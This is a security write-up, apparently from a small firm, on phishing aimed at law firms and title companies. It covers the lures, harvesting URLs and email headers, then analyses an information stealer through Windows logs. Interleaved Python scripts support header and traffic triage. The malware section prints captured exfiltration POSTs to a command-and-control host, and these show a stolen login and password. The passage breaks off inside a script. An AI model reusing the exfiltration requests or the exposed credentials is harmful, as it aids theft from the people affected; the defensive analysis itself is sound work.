Phishing in the month of July while forgetting your bank login

or

How To Fool a Legal Professional and Laugh your Way Home

Humans are horrible at mitigating risk. As complex creatures, we are the sum of all our parts, which include experience and emotion, and this can produce unwelcome consequences depending on the path you walk. Complacency causes people to ignore the obvious; worse, the culture of instant gratification, or “do these twenty things at once,” simply does not help the matter. There exists a common misunderstanding of what cybersecurity is, and this is compounded by the fact that people simply do not like to admit they have a problem. Whether it be alcoholism or a common drug addiction, rarely will you see a business say, “this is messed up and we need to fix this.” They will simply not admit it, quickly change usernames and passwords, hope it goes away, and possibly call the Feds on you if you show them where their breach is. No profession is more guilty of this cardinal sin than attorneys.

I am not here to lambaste lawyers; read Shakespeare’s Henry VI, or retain one, if you want that. What I hope to achieve in this discussion is to shine a light on common misconceptions about phishing and how it can be avoided. It is not an issue of complex cyber solutions; it is a fundamental issue of changing the way we think and approach problems. We then conclude with an interesting information stealer that pilfers credentials, which we came across as an indirect result of the phishing.

Act I:

Phishing Email One:

OneNote is not for email

For the sake of keeping the peace I must blur the domain name and the IP address in these images. Cybercrypto is not a litigious company, and the little resources we have we would rather use to pay our data-center and internet bills, so this is the best path. The first email appears to come from a local attorney and is sent to other attorneys and those he has had contact with. Observe the redacted screenshot below:

Overall it looks innocuous. The first thing we should observe is that the TO field is empty. That is the first sign of evil. The other sign of trickery is the hyperlink. For the most part in law, you will know ahead of time if you are getting a document that requires you to click on a link; it will be either an Adobe Sign document or DocuSign. However, alas, the poor legal assistant who is overly caffeinated and in fear of losing their job will click on the little hyperlink.

The next part is the more impressive part; albeit elementary, it shows some level of imagination. Upon clicking the hyperlink, the user is sent to a OneNote screen located at:

https[:]//onedrive[.]live[.]com/redir?resid=5ADDC66AFDE9F05A%212582&authkey=%21AAv8Yo6ZPSjDv-8&page=View&wd=target%28Quick%20Notes.one%7C2c6fc219-060e-448b-b3b1-31cbe4149ce5%2FFOR%20YOUR%20REFERENCE%7C8b166752-29ef-4612-a09d-74bfc3e63689%2F%29

It has been several days; at the time of writing this article, about two weeks after the phishing and malware were discovered by Cybercrypto, that link is still up. I will redact it in the screenshot.

Feel free to visit it. As you are reading this article, I will assume you have a level of intelligence, so I will not insult you by pointing out the obvious. Regardless, the fact that it’s still up means it is in the public domain. Bear in mind the entity that was being phished was informed. As to why it is still there? Well, that is on them.

Below is the screenshot with a redaction:

All this is is a OneNote page with a note on it containing a link to a so-called secure message. There is nothing highly innovative here, as it’s simply a hyperlink to another page encased in a table. What is interesting is that the phisher went to the extent of putting up this OneNote page at all. To the unsuspecting and the uninformed it gives the impression that this must be legitimate. The statement “Secured by One-Note Encryption” is simply absurd, but we cannot expect your end user to know the difference.

Fortunately, one end-user who received this reported it. However, others clicked on the link which took the user to:

https[:]//dazianhome[.]com/layouts/planning/plans

At the time of this writing this link is no longer live. When we investigated it, we were presented with a Microsoft 365 login page. There is no doubt that this was an attempt to harvest credentials. The user, after being led to the login page under a false sense of security, would have entered their username and password. This raised a question for us: who did this, and why was it coming from a law firm?

Fortunately for us we had one of the original emails, meaning the direct email, not a forward or anything like that. The headers would have been untouched, and as you know, the headers tell us everything. Now, I am only redacting the domain name of the firm in the header, but I am not redacting the IP address; otherwise the point of discovery becomes second hand. I want you to see the data as unadulterated as possible.

The header looks as follows:

What do we take away from this header?

a) The sender’s IP address is 208.70.210.4

b) protection.outlook.com designates the mail as permitted from the law firm domain.

We establish here that the sender had to have some level of credentials. Microsoft 365 will not allow an SMTP connection, or any connection, to occur unless there is some level of successful authentication.

c) asp.reflexion.net is a Sophos company

d) a HELO is received from e1e-rtc-cs-06.aws.reflexion.local on an internal IP address

e) someone is using qmail

f) the architect did not sanitize his/her X-Originating-IP header. We see it as 102.89.3.114. We look deeper and that IP address takes us to the below –

After further research we see that our nefarious actor is using Windows –

Web Browser/s on this IP: Firefox 74

OS on this IP: Windows 7 x64 Edition

A visit via Google maps shows the below:

Someone in the office had their credentials compromised for this thing to go out. A visit to portal.azure.com or protection.office.com would allow the owner of the domain to investigate and isolate when, and whose, credentials were pilfered. Unfortunately, we have no control over the systems at the compromised domain. We did have the email, provided the above, and informed the domain owner.

Act Two:

The second email, while not as pretty, is convincing, and in that it can be damning. Observe the redacted email below:

It appeared that the law firm that was compromised sent these emails to whoever was on their contact list. This included other law firms as well as medical providers. There are two things that stand out here.

a) The Office 365 logo with an open document link that takes you to the page where it attempts to harvest the credentials of the user. The URL is –

https[:]//us4.campaign-archive[.]com/?u=d360998b9516757001abd218f&id=60bd4aeffe

That URL is no longer active and it redirects to a page which states the following –

You probably found this page because one of our subscribers used Mailchimp to send you an email campaign and you traced a link in the email back here to investigate. Mailchimp is a marketing platform that serves millions of companies of all shapes and sizes, from all over the world. We send more than 1 billion emails every day, and we help our customers comply with spam laws and best practices so they can get their campaigns into their subscribers’ inboxes.


b) The more incendiary quality of this email is that it has the professional signature of the assistant to counsel, along with a link to their website. Further, in the Office 365 window we see the email of the assistant. In itself the signature looks authentic, but combined with the Microsoft 365 link and the lack of a personal message (“Hi name@domain.com” is not really convincing), it makes for high suspicion, and as you see it was sent to me with suspicion.

As before the header tells us a story –

What do we take away from this header?

a) We see an SPF record for the domain as well as DMARC and DKIM

b) mail-eopbgr680128.outbound.protection.outlook.com designated the permitted sender. This is a Microsoft server.

c) Much like before, the individual did not sanitize the X-Originating-IP header, so we see an IP address of 64.190.94.168. This means the origin came from the below:

64.190.94.168

Country: United States

Organization: Cloud South

Updated: 2020–06–06T06:48:38.166712

Number of open ports: 1

Ports: 5985/tcp

Port 5985 is usually WinRM; we did not scan the server beyond the obligatory port scan. Our purpose was to identify the origin.
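The header reading done in both acts above (the Received chain, the spf/dkim/dmarc verdicts, the unsanitised X-Originating-IP) can be scripted so it is done the same way every time. The following is an added example and not code from the article or from Cybercrypto; it uses Python's standard email module on a constructed header modelled on the two discussed above (placeholder hostnames and RFC 5737 / RFC 1918 addresses, with the article's 102.89.3.114 as the originating IP), and triage() returns the set of facts the text reads off by hand.

```python
import email
import ipaddress
import re

# Constructed sample header, modelled on the two headers discussed above: the
# outbound protection.outlook.com hop, the Authentication-Results line and an
# unsanitised X-Originating-IP.  Hostnames and the 192.0.2.x / 10.x addresses
# are placeholders; 102.89.3.114 is the originating address quoted in the article.
SAMPLE_RAW = """\
Received: from mail-eopbgr000000.outbound.protection.outlook.com (mail-eopbgr000000.outbound.protection.outlook.com [192.0.2.10])
 by mx.example-firm.invalid with ESMTPS; Mon, 6 Jul 2020 12:00:00 +0000
Received: from TENANT01.example.invalid (10.0.0.5) by TENANT02.example.invalid (10.0.0.6)
 with Microsoft SMTP Server; Mon, 6 Jul 2020 11:59:58 +0000
Authentication-Results: spf=pass (sender IP is 192.0.2.10) smtp.mailfrom=lawfirm.invalid;
 dkim=pass header.d=lawfirm.invalid; dmarc=pass action=none header.from=lawfirm.invalid
X-Originating-IP: [102.89.3.114]
From: Counsel <counsel@lawfirm.invalid>
To:
Subject: Document shared with you

(body omitted)
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
RECEIVED = re.compile(
    r"from\s+(?P<host>\S+)\s*(?:\((?P<paren>[^)]*)\))?\s+by\s+(?P<by>\S+)")


def _flat(value):
    """Collapse header folding (newline plus indent) into single spaces."""
    return " ".join(str(value).split())


def received_chain(msg):
    """Received hops in chronological order (oldest first).

    Each hop keeps the host the sender announced, any IPs the receiving MTA
    recorded in parentheses, and the receiving host.  Headers are prepended
    as mail travels, so the header order is reversed here.
    """
    hops = []
    for raw in reversed(msg.get_all("Received", [])):
        m = RECEIVED.search(_flat(raw))
        if m:
            hops.append({
                "from_host": m.group("host"),
                "from_ips": IPV4.findall(m.group("paren") or ""),
                "by_host": m.group("by"),
            })
    return hops


def originating_ip(msg):
    """X-Originating-IP as a bare string (brackets stripped), or None."""
    value = _flat(msg.get("X-Originating-IP", "")).strip("[] ")
    return value or None


def auth_results(msg):
    """spf/dkim/dmarc verdicts from the Authentication-Results header."""
    text = _flat(msg.get("Authentication-Results", ""))
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", text))


def triage(raw):
    """Extract the facts the article reads off a header and list the red flags."""
    msg = email.message_from_string(raw)
    hops = received_chain(msg)
    origin = originating_ip(msg)
    auth = auth_results(msg)
    findings = []
    if not _flat(msg.get("To", "")):
        findings.append("empty To: header, recipients hidden")
    if auth.get("spf") not in (None, "pass"):
        findings.append("SPF verdict is %s, sender not authorised for the domain" % auth["spf"])
    origin_internal = None
    if origin:
        origin_internal = ipaddress.ip_address(origin).is_private
        where = "internal range" if origin_internal else "public address, worth looking up"
        findings.append("X-Originating-IP %s (%s)" % (origin, where))
    if any(h["from_host"].endswith("protection.outlook.com") for h in hops):
        findings.append("relayed by Microsoft 365, so the sender authenticated to the tenant")
    return {"hops": hops, "origin": origin, "origin_internal": origin_internal,
            "auth": auth, "findings": findings}


if __name__ == "__main__":
    for line in triage(SAMPLE_RAW)["findings"]:
        print("-", line)
```

Feed triage() the raw source of the original message (not a forward, for the reason given above); a softfail verdict, like the "discourages use of ... as permitted sender" line further down this article, shows up as the SPF finding.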

Conclusion:

Common sense is paramount, and until people change the way they think this will continue. There is no one cure, as every setup is unique and some professions just tend to be horribly cheap. It does not help, though, to merely change your passwords and pretend nothing has happened. The tools are there to prevent these things from happening. As an example, for clients that use the Microsoft 365 infrastructure we set up alerts so that if someone logs in from an odd place, you will know about it. See below –

As you can see, the chance of the business finding out how this happened is relatively high; it just requires the will to do it. Compounded with training your users, I believe we have a fighting chance.

Act Three:

Title Companies –

Originally the intention of this article was to shine a light on how attorneys are irresponsible at securing their data. While pondering this, it occurred to me that I had to touch on the issue of Title companies. During the purchase of a home, Title companies in the United States hold a very important role, as it is the Title company that holds your data. One breach, one incident, and the realtor, the buyer, and the finance company all get dragged down. I bring this up because I have direct experience with individuals who have suffered because Title companies, much like others, take a lax view of the valuable data that they hold.

For an individual who is not tech savvy, it is possible to fool the target by buying a fake domain that is similar to one the target is used to seeing. However, the caveat for the phisher to be successful is to have prior knowledge of the target and what they do for a living. For a targeted attack this requires some work, and the best point of entry is the mail server.

Recently we came across the below, which came to an attorney at a firm we service. The attorney’s name has been redacted but I have left the Title company information intact. The reason for this:

1) I called the office from where this was generated and was summarily dismissed in a very curt manner. I identified myself as a cybersecurity professional representing my client and attempted to alert them; I was summarily dismissed and told not to click on anything.

2) An email was sent to their CTO and management, no reply — not even a “Don’t worry we got this”

Hence, I give you the below:

This email is well done; you have the following:

a) A loan number for the subject line

b) First Alarm: In the From section, both the corporate address and what looks like a person’s personal email address as well –

Stewart Title <tania.swanberg@stewart.com> tania.stewarttitle@aol.com

This is not normal, but the untrained individual would merely see the name of the person they are used to doing business with along with the domain name. In the target’s mind the personal email can be inconsequential.

c) A big ostentatious Trusted and Verified Logo

d) Second Alarm: The target’s email address is listed in a line that says “This email is intended for”, followed by a hyperlink to see an encrypted message. To further push the desire to click on the link, there is a separate button with the text Access File. The hyperlink is https[:]//u15947665.ct.sendgrid[.]net/ls/click?upn=jI8CV-2B0daa-2Fwae69VFg4EdhxwOATHRfD-2BxkgtB-2FCGjz0iYn-2FnKSaizaF-2FhysrKe6PfcbdkVi-2Bl5pOoLxnvWk8ibcpFOfPBY9apxJqyA-2BHHA-3Dmr-P_YqVc2Q6TaxfIVY64HpFtF4XoX-2FJvHUTpCviI0XA78ZMQzHOZqyjaxRIdmVXLvBIzzbKAFcgQOihFO7jpNOHxgDtzY84zn51oAipYwv41OFSBD22ab-2FF9bWjKr693sXjX7x9Vuxlh6067x84RYcL8v4ZZdlnKcflq7CvxlqAesGTH-2FzRiaz7IJ4GMaNxhvbVIuGHP5s06QL6nw75cjTPmRFRB77YxMz4sSIo-2BgLniPEo-3D

This is obviously not Stewart Title, nor would they most likely send such a thing.

e) The rest of the email contains the office address along with the signature
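The First Alarm above, a display name for one company with two addresses behind it, is something a mail filter or a quick script can catch before a human has to. The following is an added example, not code from the article: it checks a raw From: value for more than one address, for a display name whose brand does not appear in the sending domain, and for a domain within two edits of one the recipient is used to (the lookalike domain this act describes). The sample sender, the expected-domain set and the .invalid hostnames are constructed placeholders, not the addresses from the email.

```python
import re

# One addr-spec: local part, '@', then at least two dot-separated labels.
ADDR = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def addresses(from_value):
    """Every addr-spec in the From: value, in order (a sane From: has exactly one)."""
    return ADDR.findall(from_value)


def display_name(from_value):
    """Text before the first '<', without surrounding quotes; '' if none."""
    if "<" not in from_value:
        return ""
    return from_value.split("<", 1)[0].strip().strip('"')


def registrable(domain):
    """Last two labels (example.com).  Simplification: ignores suffixes like co.uk."""
    return ".".join(domain.lower().split(".")[-2:])


def levenshtein(a, b):
    """Edit distance, used to spot one- or two-character lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_from(from_value, expected_domains):
    """Flag the sender anomalies of the Title-company email above.

    expected_domains: registrable domains the recipient legitimately deals with
    (a constructed allow-list here; in practice the firm's contact directory).
    """
    addrs = addresses(from_value)
    name = display_name(from_value)
    name_tokens = [t for t in re.findall(r"[a-z]+", name.lower()) if len(t) >= 4]
    findings = []
    if len(addrs) > 1:
        findings.append("multiple addresses in From: " + ", ".join(addrs))
    for addr in addrs:
        reg = registrable(addr.split("@", 1)[1])
        if reg in expected_domains:
            continue
        for expected in expected_domains:
            if 0 < levenshtein(reg, expected) <= 2:
                findings.append("lookalike domain %s resembles %s" % (reg, expected))
        label = reg.split(".")[0]
        if name_tokens and not any(tok in label for tok in name_tokens):
            findings.append("display name '%s' does not match domain %s" % (name, reg))
    return {"addresses": addrs, "display_name": name, "findings": findings}


if __name__ == "__main__":
    # Constructed sample with the same shape as the First Alarm above.
    sample = "Example Title <agent@exampletitle.invalid> agent.exampletitle@freemail.invalid"
    for f in check_from(sample, {"exampletitle.invalid"})["findings"]:
        print("-", f)
```

The address extraction is done with a regex rather than email.utils.getaddresses on purpose: recent Python releases parse a From: with two unseparated addresses strictly and return nothing at all, which hides exactly the anomaly this check is looking for.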

As always, the email can tell us a lot more.

The header speaks to us –

The first thing that stands out here is the IP address this email is from.

Tue, 23 Jun 2020 18:26:25 +0000 (UTC)
X-Virus-Scanned: Proofpoint Essentials engine
Received: from mx1-us1.ppe-hosted.com (unknown[10.7.66.37]) by mx1-us1.ppe-hosted.com (PPE Hosted ESMTP Server) with ESMTPS id DC2D52200A7

protection.outlook.com: domain of transitioning sendgrid.net discourages use of 148.163.129.52 as permitted sender

The phisher is also using SmartSend as the mailer. The app looks at when a recipient opens a message and then schedules the next mailing at the times closest to the last open. What we don’t have is the originating IP, but this is most likely a larger operation. At the time of this writing the link has ceased to work. For this I am content, as it was reported. Currently the below shows up when the link is hit –

<Error>

<Code>UserProjectAccountProblem</Code>

<Message>User project billing account not in good standing.</Message>

<Details>The billing account for the owning project is disabled in state closed</Details>

</Error>

The URL redirect takes the user to the below:

https://storage.googleapis.com/aadobe-tombac-780141661/index.html

Here was the original request:

GET https://u15947665.ct.sendgrid.net/ls/click?upn=jI8CV-2B0daa-2Fwae69VFg4EdhxwOATHRfD-2BxkgtB-2FCGjwiJFuSIw7deyo58A-2BrZRYCJOytdbkovOCmcbsyFAJKGL0Cu9CiGM4PhnENEukVPFE-3D7_Uw_YqVc2Q6TaxfIVY64HpFtF4XoX-2FJvHUTpCviI0XA78ZMQzHOZqyjaxRIdmVXLvBIztUV1uNjtg2wgJJGEPtgq9K4oFhsgj5NO23aSjd16YxhyGs9df7tVXsHS8OkWSsnaESkUkNJ8EVGqHKnHDFyAlrNzgdhILLMvYD-2FzBUkrgg3hP7lpNLGxgm3uqdWtZqsE4-2BKUBZP4kCRDHcX2yXRofr0f-2BBos9Fw599jpCVLBNDm4qwFn4LEle85soAnJ0crN HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Host: u15947665.ct.sendgrid.

which then gave us the following response:

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 10 Jul 2020 23:27:20 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 88

Connection: keep-alive

Location: https://storage.googleapis.com/aadobe-tombac-780141661/index.html

X-Robots-Tag: noindex, nofollow
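The request and 302 above show why the hop-by-hop view matters: the tracking link is not the phishing page, the Location header is. The following is an added example, not the article's or any vendor's tooling, of unrolling such a chain from raw responses without rendering anything: parse_response() extracts the status and Location, and unroll() follows it with a hop cap, loop detection and an http/https-only rule. The fetcher is injected, so the sample runs offline against constructed canned responses with placeholder hostnames; in real use fetch() would do the GET through whatever isolated egress the analyst uses.

```python
from urllib.parse import urljoin, urlsplit

# Constructed responses modelled on the exchange above (tracking link -> 302 ->
# object-storage landing page).  The hostnames are placeholders, not the URLs
# from the article; the a.invalid pair is a deliberate redirect loop.
TRACKER = "https://click.tracker.invalid/ls/click?upn=TOKEN"
LANDING = "https://storage.example.invalid/bucket/index.html"
RESPONSES = {
    TRACKER: "HTTP/1.1 302 Found\r\nServer: nginx\r\nContent-Length: 0\r\n"
             "Location: " + LANDING + "\r\nX-Robots-Tag: noindex, nofollow\r\n\r\n",
    LANDING: "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 6\r\n\r\n<html>",
    "https://a.invalid/": "HTTP/1.1 302 Found\r\nLocation: /b\r\n\r\n",
    "https://a.invalid/b": "HTTP/1.1 302 Found\r\nLocation: https://a.invalid/\r\n\r\n",
}

REDIRECTS = {301, 302, 303, 307, 308}


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, {lower-case header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return status, headers


def fake_fetch(url):
    """Stand-in for a real fetcher; returns the canned raw response for url."""
    return RESPONSES[url]


def unroll(url, fetch, max_hops=10):
    """Follow Location headers without rendering anything.

    fetch(url) must return the raw response text for url.  Returns the chain of
    URLs visited and the reason the walk stopped.  Only http/https are followed,
    hops are capped and loops are detected, so a hostile chain cannot run the
    analyst round in circles or off to another scheme.
    """
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        if urlsplit(url).scheme not in ("http", "https"):
            return chain, "refused non-http scheme"
        status, headers = parse_response(fetch(url))
        if status not in REDIRECTS or "location" not in headers:
            return chain, "final status %d" % status
        url = urljoin(url, headers["location"])   # Location may be relative
        if url in seen:
            return chain, "redirect loop"
        seen.add(url)
        chain.append(url)
    return chain, "hop limit reached"


if __name__ == "__main__":
    chain, why = unroll(TRACKER, fake_fetch)
    print(" -> ".join(chain), "(%s)" % why)
```

One point worth keeping in mind when swapping in a real fetcher: a per-recipient tracking link like the one above reports the click back to the sender, so resolving it confirms a live mailbox; do it from infrastructure you are happy to burn, not from the recipient's workstation.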

At the time when we first got hold of the email the URL was hosting a webpage that was harvesting Microsoft 365 credentials. The links were also reported immediately to their respective providers; we obviously would not wait for the company to do something about it. We recommended to each entity discussed in this narrative to go to the security portal in Microsoft 365 and look at their user history; that is where you would find whose account may have been accessed. Microsoft 365 provides excellent tools for auditing, and it is disappointing when we see people simply ignore them.

An attitude of arrogance does not protect your client’s data. As mentioned previously, our office has handled cases where the phisher was able to get the company directory, identified the workers and the realtors, and sent an email to the target convincing them to send the money via wire to the account number given by them. One of the clients, an elderly woman, did so because the phisher not only spoke with knowledge of her paperwork but spoke of other people in the office, and yet opposing counsel in this case would not acknowledge that it was a breach. Each one of these breaches indicates someone got in and did their research. A person’s data is important; a breach can affect that person’s life for years to come through no fault of their own. As a holder of such data, people have a moral responsibility to safeguard it and not treat it as an afterthought. I am disturbed by the lack of thought given to cybersecurity; worse, those who have that lack of thought practice the same tired corporate rhetoric that looks like it was written on a bathroom wall claimed by zombie Human Resources people who repeat the same diatribe over and over again but have no idea of the technology or the landscape. Though I am disturbed by this, I believe that pragmatism shall win the day.

Which now leads us to something different which we encountered in our travels.

Section II

Targeted malware aims to steal data and send it back to a source. The vector of infection, or point of entry, will always be external to the system: something must be placed on the computer. Much like a disease, you’re going to catch it from somewhere. Signatures are problematic; there are maladies that do not register, and only once the crowd has sourced the infection does it become known publicly. Neural networks and machine learning are a good start, but that can be mitigated (more on that in a later article). For this scenario we take it to the ground level: alerts and watching directories that bear watching.

The first sign is obvious and by far one of the most egregious. We always observe the user’s home directory; this will always be a point of entry and it is foolish not to set alerts there. What we see is a DLL at work.

In our Elastic setup we pull in both Sysmon and the Windows audit logs.

Figure One:

Figure Two:

What we are seeing here is a DLL named sppcommpatch.dll being registered for use in the operating system via the rundll32.exe program. A DLL is a dynamic link library; the purpose of rundll32.exe is to run routines held in the DLL. The fact that you have received an alert that this is running should be of immediate concern, and remediation must begin — or simply run to that workstation, and fast.

The next odd thing we bear witness to is what the logs tell us about the DLL –

Here we see the image loaded, which is the questionable DLL. However, we are then presented with what is the original file name of the DLL and a product description. It is listed as File comparison utility and under Product it says Win 7 DDK driver. DDK stands for Driver Development Kit. I suppose this could be a pun; if so, a very good one.

Once the DLL is registered a new process is created, a process that is familiar but will not do what it is normally supposed to do –

Windows Error Reporting is an event-based infrastructure meant to gather information about hardware and software problems that Windows can detect. Here we see the process being created at the behest of our suspect DLL. Regardless of the scenario, you should always have an alert for Windows Error Reporting; this, however, is not it.

The wermgr.exe process has now created an svchost.exe process. Note that odd directory in Roaming — “ArtPress” — this was never on the computer.

We also look for changes to permissions, specifically Event ID 4670, which will alert you when the access control list of an object changes. Here we see the permissions on svchost.exe changing. By this time you can surmise that something is about to happen.

Time For A Trip:

External connections should always be monitored and logged — this is a must. You, as the chief, know where your users go; especially in a small shop, it’s not hard to check whether someone is going somewhere they do not need to be going. If I have a medical clinic, I don’t want any social media or external sites beyond what my users require. Hence, we have Event ID 5152 — the Windows Filtering Platform has blocked a packet –

It is essential that we know what process started this. Event 5156 — the Filtering Platform Connection — reveals to us our devil:

A copy of wermgr.exe is initiating these connections. The server it’s calling:

WELCOME TO JAKARTA

Our command and control server is here. Though we get a lot by watching the Windows logs, a one-trick pony we are not — we aggregate from our other sources.

We have a SYN packet at 0 bytes followed by an ACK at 0 bytes, concluding with an ACK and PSH of only 168 bytes. The clear text shown here displays something about Internet Widgets Pty. We have lots of disk space, so we save our pcap files and use them for search and alerts. We see here an encrypted alert; it bears more research later, but it stood out.

We also use Security Onion, which alerts us as well to anything out of the norm. Snort is our friend. We now have confirmation that the traffic mentioned above is going to a CnC server.

This thing is sneaky because there is not just one connection being made; there are several. For our next stop, svchost.exe is piloting the jet.

Event ID 5156 –

Notice the odd port — 8082. Your firewall should only be allowing your users out on the traditional ports unless something different is needed, and if so, you should be accounting for it.

We have arrived in Cambodia in the house of Mekongnet PP

Our Security Onion box alerts us that this is a CnC server –

One of the most important questions we have is what is being communicated to this server. Fortunately, unlike the first CnC, we have clear text. Apparently, our workstation and network have made a full introduction to our associates at MeKongNet PP.

The information is very telling: the CnC now knows a limited amount of our Active Directory layout, but they know who I am and what kind of network I am on. All this was transmitted over eleven packets. Notice the server name of the CnC:

HTTP/1.1 200 OK
server: Cowboy
date: Sat, 11 Jul 2020 21:33:23 GMT
content-length: 3
Content-Type: text/plain

This is a simple, clever and excellent manner of reconnaissance.

“svchost.exe” now takes us to Brazil, Event ID 5156 –

As before we see communication going through port 8082. Our Security Onion box alerted us to twenty-two entries. The following stand out:

As you can see, our Security Onion box alerted us to the fact that the above-mentioned IP address is a CnC. What is transmitted in the packets is interesting and reveals to us not the family but the type of malware this is. In the prior transmission you see the information of the user, computer, domain, and email addresses. In this one we see form data:

Note also that it’s posting to server: Cowboy. There are some fascinating things here, and we see it in plain text right in front of us.

In one packet we see:

-----------LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name="formdata"

{]}
-----------LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name="billinfo"

{]}
-----------LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name="cardinfo"

{]}
-----------LSGMBXVNQBJTUJYR--

The form data above is pretty obvious, but if you need more — the next packet:

2020/07/11 17:34:14 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------FAEUAVUROVRVHWVJ
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 319
Connection: Close
Cache-Control: no-cache

2020/07/11 17:34:14 ack psh 319 bytes

-----------FAEUAVUROVRVHWVJ
Content-Disposition: form-data; name="data"

https://login.microsoftonline.com/|rgonzalez@cybercrypto.net|
https://www.bankofamerica.com/|justin1893|Yulia123456!

-----------FAEUAVUROVRVHWVJ
Content-Disposition: form-data; name="source"

IE passwords
-----------FAEUAVUROVRVHWVJ--

This malware is attempting to extract as much as possible, as you see below — it even wants OpenVPN logins.

2020/07/11 17:35:13 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------KYMEAHVVEDIFOTBH
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 219
Connection: Close
Cache-Control: no-cache

2020/07/11 17:35:13 ack psh 219 bytes

-----------KYMEAHVVEDIFOTBH
Content-Disposition: form-data; name="data"



-----------KYMEAHVVEDIFOTBH
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------KYMEAHVVEDIFOTBH--


And of course, I was surprised by the gall of this (surprised but impressed):

2020/07/11 17:35:46 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------YLXXQECBCPUHXJQX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 210
Connection: Close
Cache-Control: no-cache

2020/07/11 17:35:46 ack psh 210 bytes

-----------YLXXQECBCPUHXJQX
Content-Disposition: form-data; name="data"



-----------YLXXQECBCPUHXJQX
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------YLXXQECBCPUHXJQX--

Guard your OpenSSH keys — the world wants them. Even if you don’t.
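All three uploads above share one layout: a multipart/form-data body whose "source" part names the store being looted and whose "data" part carries url|user|secret lines. The following is an added example, not the article's own tooling, that parses such a body the way a pcap-driven alert could: parse_multipart() splits on the boundary taken from Content-Type, credential_records() breaks the data lines apart while redacting the secret so the report itself does not become another copy of the passwords, and summarize() flags the stealer field names and source labels seen above. The sample body and its credentials are constructed placeholders.

```python
import re

# Constructed multipart body with the same layout as the packets above; the
# credentials are placeholders, not the values captured in the article.
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=---------AAAABBBBCCCCDDDD"
SAMPLE_BODY = (
    "-----------AAAABBBBCCCCDDDD\r\n"
    'Content-Disposition: form-data; name="data"\r\n\r\n'
    "https://login.example.invalid/|user@example.invalid|\r\n"
    "https://bank.example.invalid/|user01|Placeholder1!\r\n\r\n"
    "-----------AAAABBBBCCCCDDDD\r\n"
    'Content-Disposition: form-data; name="source"\r\n\r\n'
    "IE passwords\r\n"
    "-----------AAAABBBBCCCCDDDD--\r\n"
)

# Field names and 'source' labels that mark a stealer upload (from the packets above).
STEALER_FIELDS = {"formdata", "billinfo", "cardinfo"}
STEALER_SOURCES = ("passwords", "private keys", "configs")


def parse_multipart(content_type, body):
    """Return {field name: value} for a multipart/form-data body.

    The boundary comes from the Content-Type header; each part in the body is
    introduced by '--' + boundary and the last one is closed with a trailing '--'.
    """
    boundary = re.search(r"boundary=([^;\s]+)", content_type).group(1)
    fields = {}
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":
            continue                      # preamble before the first part, or the closer
        head, _, value = chunk.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value.strip("\r\n")
    return fields


def credential_records(fields):
    """Split the 'url|user|secret' lines of the data field, keeping secrets out of the report."""
    records = []
    for line in fields.get("data", "").splitlines():
        parts = line.split("|")
        if len(parts) < 2:
            continue
        secret = parts[2] if len(parts) > 2 else ""
        records.append({"url": parts[0], "user": parts[1],
                        "secret_present": bool(secret), "secret_redacted": "*" * len(secret)})
    return records


def summarize(content_type, body):
    """One triage record per captured POST: what was sent and whether it looks like exfil."""
    fields = parse_multipart(content_type, body)
    source = fields.get("source", "")
    suspicious = (any(k in source.lower() for k in STEALER_SOURCES)
                  or bool(STEALER_FIELDS & set(fields)))
    return {"fields": sorted(fields), "source": source,
            "suspicious": suspicious, "records": credential_records(fields)}


if __name__ == "__main__":
    report = summarize(SAMPLE_CONTENT_TYPE, SAMPLE_BODY)
    print(report["source"], "- suspicious" if report["suspicious"] else "- benign")
    for r in report["records"]:
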